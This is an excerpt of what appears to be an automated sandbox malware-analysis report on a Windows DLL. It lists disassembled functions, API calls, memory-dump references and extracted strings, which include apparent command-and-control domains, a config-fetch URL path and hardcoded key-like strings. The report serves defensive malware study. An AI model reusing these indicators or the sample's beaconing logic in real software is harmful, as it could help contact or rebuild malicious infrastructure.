__time64.LIBCMT ref: 1000E1B1

Part of subcall function 10034410: GetSystemTimeAsFileTime.KERNEL32(?,00000007,00000007,?,10007696,00000000,1005ADE8,?), ref: 10034419
Part of subcall function 10034410: __aulldiv.LIBCMT ref: 10034439

_rand.LIBCMT ref: 1000E1BE
__time64.LIBCMT ref: 1000E1C7

Part of subcall function 10011419: __EH_prolog.LIBCMT ref: 1001141E

_sprintf.LIBCMT ref: 1000E228

Part of subcall function 1000246E: __EH_prolog.LIBCMT ref: 10002473

Sleep.KERNELBASE(niserr), ref: 1000E3FF

Strings

/index.php/inface/Heart/getConfigDyn?m_id=%s&member_id=%d&time=%lld, xrefs: 1000E222
niserr, xrefs: 1000E3ED
api.5566331.com, xrefs: 1000E255
hjh~$754jhghj, xrefs: 1000E31E
Make Context:%s,time:%d,rand:%d, xrefs: 1000E427

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: H_prolog$Time__time64$FileSleepSystem__aulldiv_rand_sprintf
String ID: /index.php/inface/Heart/getConfigDyn?m_id=%s&member_id=%d&time=%lld$Make Context:%s,time:%d,rand:%d$api.5566331.com$hjh~$754jhghj$niserr
API String ID: 105401972-798844403
Opcode ID: c8a749317634e0655c4f41a80e829878645b6c3bdfcc3fb24e38985346b8fab7
Instruction ID: 49858955eb463be79c684a571caf072d61cc3a4debedbcbecd596b130e18948f
Opcode Fuzzy Hash: c8a749317634e0655c4f41a80e829878645b6c3bdfcc3fb24e38985346b8fab7
Instruction Fuzzy Hash: E8815D78C00249AEDB14DBA4CC91BEDB7B8EF14340F50849AE45A77156EF346B89CFA1

Function 1000E4E1 Relevance: 19.5, APIs: 5, Strings: 6, Instructions: 203
threadsleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 1000E7F8: ReleaseMutex.KERNEL32(00000000,00000001,10168660,100074E8), ref: 1000E816
Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000), ref: 1000E822
Part of subcall function 1000E7F8: Sleep.KERNELBASE(0000044C,?,00000001,10168660,100074E8), ref: 1000E831
Part of subcall function 1000E7F8: TerminateThread.KERNEL32(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E84A
Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E852
Part of subcall function 1000E7F8: TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E868
Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E870
Part of subcall function 1000E7F8: TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E886
Part of subcall function 1000E7F8: CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E88E

Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAD5
Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DAEF
Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB04
Part of subcall function 1000DA3F: _malloc.LIBCMT ref: 1000DB1D

Sleep.KERNELBASE(000003E8,?,?,?,1005ADE8,?,?,?,00000000), ref: 1000E62E

Part of subcall function 1000DB5E: __EH_prolog.LIBCMT ref: 1000DB63
Part of subcall function 1000DB5E: gethostbyname.WS2_32(wktcp.61611.live), ref: 1000DB78

Sleep.KERNEL32(000003E8), ref: 1000E68C

Part of subcall function 1000DB5E: inet_addr.WS2_32(127.0.0.1), ref: 1000DBA7
Part of subcall function 1000DB5E: inet_addr.WS2_32(127.0.0.0), ref: 1000DBB2
Part of subcall function 1000DB5E: inet_addr.WS2_32(0.0.0.0), ref: 1000DBBD
Part of subcall function 1000DB5E: inet_addr.WS2_32(114.114.114.114), ref: 1000DC08
Part of subcall function 1000DB5E: inet_addr.WS2_32(?), ref: 1000DC75

CreateThread.KERNEL32(00000000,00000000,1000D124,?,00000000,00000000), ref: 1000E725
CreateThread.KERNELBASE(00000000,00000000,1000D556,?,00000000,00000000), ref: 1000E767
CreateThread.KERNELBASE(00000000,00000000,Function_0000D52D,?,00000000,00000000), ref: 1000E785

Strings

i, xrefs: 1000E594
l, xrefs: 1000E5BE
[HOST] , xrefs: 1000E5A1, 1000E5A6, 1000E5AE
Http GetSystem config is faild, xrefs: 1000E5B8, 1000E5BD, 1000E5CD
[HOST]Today is has been running , xrefs: 1000E57A, 1000E586
config is faild, xrefs: 1000E5D7

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Thread$inet_addr$CloseHandle_malloc$CreateSleepTerminate$H_prologMutexReleasegethostbyname
String ID: Http GetSystem config is faild$[HOST] $[HOST]Today is has been running $config is faild$i$l
API String ID: 1403256369-2250681267
Opcode ID: 74273a4823bbfb05fca83037bc54ed03a1f4fb284fa863f7a13985c7d6914954
Instruction ID: 7789fda3e1e64cde54be39b73e63a15e1d5b9d6e7ac2d44710eacef3f7df3415
Opcode Fuzzy Hash: 74273a4823bbfb05fca83037bc54ed03a1f4fb284fa863f7a13985c7d6914954
Instruction Fuzzy Hash: 9F71D7B5508781AFE310DF24CC84AAFBBE9EF88394F00091DF49A57295DB74AD44CB62

Function 1000D5A3 Relevance: 14.2, APIs: 5, Strings: 3, Instructions: 169synchronizationCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 1000D5A8

Part of subcall function 10033888: _malloc.LIBCMT ref: 100338A0

Concurrency::details::_Concurrent_queue_base_v4::_Internal_throw_exception.LIBCPMT ref: 1000D691

Part of subcall function 1003245C: std::exception::exception.LIBCMT ref: 10032472
Part of subcall function 1003245C: __CxxThrowException@8.LIBCMT ref: 10032487

_sprintf.LIBCMT ref: 1000D764
CreateMutexA.KERNELBASE(00000000,00000000,?,00000000,00000000,00000000,00000000,000000FF,?,?,?,?,10065258,00000000,0000000F,00000000), ref: 1000D7CC
__time64.LIBCMT ref: 1000D809

Strings

ami.sh74lmy.com, xrefs: 1000D753
%s%s, xrefs: 1000D75E
jkdi%42&!#123, xrefs: 1000D776

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Concurrency::details::_Concurrent_queue_base_v4::_CreateException@8H_prologInternal_throw_exceptionMutexThrow__time64_malloc_sprintfstd::exception::exception
String ID: %s%s$ami.sh74lmy.com$jkdi%42&!#123
API String ID: 3941556643-366288768
Opcode ID: 4e621263689d016038f60075a19200faf700512eb17d5e2d414ce0ae6ad1d294
Instruction ID: 694c5179693b881f44d76fd1f052d4137bf0354451c1df981b2dbb7ff4a16f9c
Opcode Fuzzy Hash: 4e621263689d016038f60075a19200faf700512eb17d5e2d414ce0ae6ad1d294
Instruction Fuzzy Hash: 1381F1B4801B459ED721CFBAC4917DAFBE4FF19300F90896ED1AE97242DB706644CB61

Function 1000E7F8 Relevance: 13.6, APIs: 9, Instructions: 57threadsleepsynchronizationCOMMONLIBRARYCODE

Download Yara Rule

APIs

ReleaseMutex.KERNEL32(00000000,00000001,10168660,100074E8), ref: 1000E816
CloseHandle.KERNEL32(00000000), ref: 1000E822
Sleep.KERNELBASE(0000044C,?,00000001,10168660,100074E8), ref: 1000E831
TerminateThread.KERNEL32(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E84A
CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E852
TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E868
CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E870
TerminateThread.KERNELBASE(00000000,00000000,?,00000001,10168660,100074E8), ref: 1000E886
CloseHandle.KERNEL32(00000000,?,00000001,10168660,100074E8), ref: 1000E88E

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CloseHandle$TerminateThread$MutexReleaseSleep
String ID:
API String ID: 1937260624-0
Opcode ID: 46664f924153e172b5295a1f84d1b4d0382347f0e01acedb0fa99ae70939fa27
Instruction ID: 37b1b03ea3f2de3eb637aef0c1f15a50e86a627c4c476671b1db0ab1197ea950
Opcode Fuzzy Hash: 46664f924153e172b5295a1f84d1b4d0382347f0e01acedb0fa99ae70939fa27
Instruction Fuzzy Hash: 3B11D631600B44ABF760DB35CC84BEBB7E8EF48795F114829E1AEA61A0DB74AC448B54

Function 10017CD2 Relevance: 12.3, APIs: 2, Strings: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 10017CF2
_wprintf.LIBCMT ref: 10017D17

Strings

Error (%s) in line: %d in file: %s, xrefs: 10017CED, 10017D12
_requestBuffer.length() > 0, xrefs: 10017CE8
sendHeaders(), xrefs: 10017D0D
request: %s%s, xrefs: 10017D3C
inc\http\HttpConnection.cpp, xrefs: 10017CDB, 10017CE2, 10017D07

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _wprintf
String ID: request: %s%s$Error (%s) in line: %d in file: %s$_requestBuffer.length() > 0$inc\http\HttpConnection.cpp$sendHeaders()
API String ID: 2738768116-1894206355
Opcode ID: aac0029b60e65bad708861f4eb6a3c3131cf6d18cbd002a15836ac9e94790d54
Instruction ID: 0e289029b42b07f0cd472e7fd920a7862120a76635c283eded3de750890f031e
Opcode Fuzzy Hash: aac0029b60e65bad708861f4eb6a3c3131cf6d18cbd002a15836ac9e94790d54
Instruction Fuzzy Hash: BC01F530201254AAF330EA24AC1AEA736B5FF92601F44081FF5464F183D771EA8A8372

Function 1001A313 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 33networkCOMMONLIBRARYCODE

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 1001A334
send.WS2_32(?,00000000,?,00000000), ref: 1001A34E
WSAGetLastError.WS2_32(?,?,10017BAA,?,1005AEE0,00000000,Content-Length), ref: 1001A35B

Strings

inc\http\Socket.cpp, xrefs: 1001A323
Error (%s) in line: %d in file: %s, xrefs: 1001A32F
data.length() > 0, xrefs: 1001A32A

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: ErrorLast_wprintfsend
String ID: Error (%s) in line: %d in file: %s$data.length() > 0$inc\http\Socket.cpp
API String ID: 2875704336-3018366312
Opcode ID: 4ec6c211ff026b7764385a175423c0615eb00ac7a6313221d5c3647955ba46a1
Instruction ID: a370ff211135ef3551e3cbd0d85bcf54042522b8ec64c26ef99c261646a77a4d
Opcode Fuzzy Hash: 4ec6c211ff026b7764385a175423c0615eb00ac7a6313221d5c3647955ba46a1
Instruction Fuzzy Hash: 0EF0B432500620BBE720AA64DC04B86F7A4FB01671F004627FA249B691C370BE8587E1

Function 1001A0F8 Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 29networkCOMMON

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 1001A110
inet_addr.WS2_32 ref: 1001A119
gethostbyname.WS2_32 ref: 1001A131

Strings

inc\http\Socket.cpp, xrefs: 1001A0FF
Error (%s) in line: %d in file: %s, xrefs: 1001A10B
address != NULL, xrefs: 1001A106

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _wprintfgethostbynameinet_addr
String ID: Error (%s) in line: %d in file: %s$address != NULL$inc\http\Socket.cpp
API String ID: 2322658221-3467638553
Opcode ID: 78475d0063012b7c6acc5eaa6a2975fe2cf6f67b4af13489960fe63b029e21f7
Instruction ID: 4b9a3f45cc822d481f5f270d039c0712fd041b9735d2b0daff9342695111d3cf
Opcode Fuzzy Hash: 78475d0063012b7c6acc5eaa6a2975fe2cf6f67b4af13489960fe63b029e21f7
Instruction Fuzzy Hash: 08E092316109307BDB11EB2CAC44AC933D4EB06232F418143F404DB1A2D774EDC24AD5

Function 100117AA Relevance: 9.1, APIs: 6, Instructions: 84synchronizationsleepCOMMONLIBRARYCODE

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 100117AF
Sleep.KERNELBASE(00002710,?,?,00000000,000000FF,1005AF8C,00000000,10006588,?,00000000), ref: 10011861
ReleaseMutex.KERNEL32 ref: 10011873
CloseHandle.KERNELBASE ref: 10011881
ReleaseMutex.KERNEL32 ref: 10011890
CloseHandle.KERNEL32 ref: 10011898

Part of subcall function 10001E92: _memmove.LIBCMT ref: 10001EF7

Part of subcall function 100154F5: __EH_prolog.LIBCMT ref: 100154FA
Part of subcall function 100154F5: _sprintf.LIBCMT ref: 10015565
Part of subcall function 100154F5: OpenMutexA.KERNEL32(00100000,00000000,?), ref: 100155D4
Part of subcall function 100154F5: GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 100155DE
Part of subcall function 100154F5: OpenMutexA.KERNEL32(00100000,00000000,?), ref: 10015605
Part of subcall function 100154F5: GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 10015609
Part of subcall function 100154F5: CreateMutexA.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,?), ref: 10015634

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: Mutex$CloseErrorH_prologHandleLastOpenRelease$CreateSleep_memmove_sprintf
String ID:
API String ID: 4039639769-0
Opcode ID: 16fd9f3295214c5a4623525ff434245626e2363462dd747976b7434c5c43acdf
Instruction ID: 3068f5a1bf16b1bd64fdc3553b6d17508d20df758c6a95adc449cb463f1d6c97
Opcode Fuzzy Hash: 16fd9f3295214c5a4623525ff434245626e2363462dd747976b7434c5c43acdf
Instruction Fuzzy Hash: 8F31C075900124AFEB14DF64CC96BED77B5EF44360F10826AF806AB1A2DF74AE85CB50

Function 1001A91C Relevance: 9.0, APIs: 6, Instructions: 35sleepsynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 10005BE6: WSAStartup.WS2_32(00000202,?), ref: 10005C19

Sleep.KERNELBASE(0000000A), ref: 1001A92E
ReleaseMutex.KERNEL32(00000000), ref: 1001A94E
CloseHandle.KERNEL32 ref: 1001A960
ReleaseMutex.KERNEL32 ref: 1001A968
CloseHandle.KERNEL32 ref: 1001A974
Sleep.KERNELBASE(000001F4), ref: 1001A989

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: CloseHandleMutexReleaseSleep$Startup
String ID:
API String ID: 3889887703-0
Opcode ID: b6536de9062241b7fe60a5839f20fadcd81dc72c237b08cbf7aecf7999aa4c68
Instruction ID: 77a9dc64d7ec4658a88107c2dfb50ea3d3ee354ef9d95e056dd7178ddb840d27
Opcode Fuzzy Hash: b6536de9062241b7fe60a5839f20fadcd81dc72c237b08cbf7aecf7999aa4c68
Instruction Fuzzy Hash: 36F03CB1510230AFFB41DF75DC8D75A3BA2FB1935AF024215F085961B2C7F85980CB5A

Function 10017BF7 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_wprintf.LIBCMT ref: 10017C1D

Strings

Error (%s) in line: %d in file: %s, xrefs: 10017C18
pDataOut != NULL, xrefs: 10017C13
, xrefs: 10017C48, 10017C56
inc\http\HttpConnection.cpp, xrefs: 10017C09

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: _wprintf
String ID: $Error (%s) in line: %d in file: %s$inc\http\HttpConnection.cpp$pDataOut != NULL
API String ID: 2738768116-4064496196
Opcode ID: 16f2bd09eebcb51e6d0a8526b0b8506e1988ebf9b6b2402dbc7d09d8cb7114fe
Instruction ID: b3279fd1f64e757fc39bef5126cbef0cf3ed16947356f535cad2a22282ac5a8b
Opcode Fuzzy Hash: 16f2bd09eebcb51e6d0a8526b0b8506e1988ebf9b6b2402dbc7d09d8cb7114fe
Instruction Fuzzy Hash: 620108351006057AE331EA64CC41FD777B8EB20260F04095FF646961D3DB61FAC983A2

Function 1001B976 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 33fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileMappingA.KERNEL32(000000FF,00000000,00000004,00000000,00100000,Local\jkhgjfgs3gGwsef), ref: 1001B98B
GetLastError.KERNEL32(?,?,1001A9D0), ref: 1001B99A
MapViewOfFile.KERNELBASE(00000000,000F001F,00000000,00000000,00100000,?,?,1001A9D0), ref: 1001B9AD
CloseHandle.KERNEL32(?,?,1001A9D0), ref: 1001B9C2

Strings

Local\jkhgjfgs3gGwsef, xrefs: 1001B978

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches

Similarity

API ID: File$CloseCreateErrorHandleLastMappingView
String ID: Local\jkhgjfgs3gGwsef
API String ID: 1661045500-2024575643
Opcode ID: 6bfd62d0656e9680acb0383248483cac1d890897ac2912ba9097326d9a3cc9c3
Instruction ID: 510e1f7a28177a6c4adca6b9fa798e7cec5f3aa40cb69a399bd7e5cf68b8c7d0
Opcode Fuzzy Hash: 6bfd62d0656e9680acb0383248483cac1d890897ac2912ba9097326d9a3cc9c3
Instruction Fuzzy Hash: ADF0A9B1100632BBE7208B329C9CE873F68EF8A7B4F114210FA09DA1A0C730C442DAB0

Function 10007486 Relevance: 7.6, APIs: 5, Instructions: 52threadCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1BD
Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1C8
Part of subcall function 1001E1A7: closesocket.WS2_32(?), ref: 1001E1D4
Part of subcall function 1001E1A7: Sleep.KERNELBASE(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E1EE
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E1F5
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E1FA
Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E20C
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E213
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E218
Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E22A
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E231
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E236
Part of subcall function 1001E1A7: Sleep.KERNEL32(00000064,?,?,?,10007547,?,1000682B,?,?,?), ref: 1001E248
Part of subcall function 1001E1A7: TerminateThread.KERNELBASE(?,00000000,?,10007547,?,1000682B,?,?,?), ref: 1001E24F
Part of subcall function 1001E1A7: CloseHandle.KERNEL32(?,?,10007547,?,1000682B,?,?,?), ref: 1001E254
Part of subcall function 1001E1A7: Sleep.KERNELBASE ref: 1001E26F

TerminateThread.KERNELBASE(00000260,00000000), ref: 100074FB
CloseHandle.KERNEL32(00000260), ref: 10007507
TerminateThread.KERNELBASE(0000025C,00000000), ref: 10007516
CloseHandle.KERNEL32(0000025C), ref: 10007522
CloseHandle.KERNEL32(00000230), ref: 1000752F

Part of subcall function 1000BDB5: __EH_prolog.LIBCMT ref: 1000BDBA

Memory Dump Source

Source File: 00000003.00000002.3294272838.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true

Associated: 00000003.00000002.3294220823.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294407475.0000000010053000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.0000000010065000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294523850.000000001016A000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.000000001016D000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3294666309.0000000010273000.00000020.00001000.00020000.00000000.sdmpDownload File
Associated: 00000003.00000002.3295251565.00000000102D9000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_10000000_control.jbxd

Yara matches
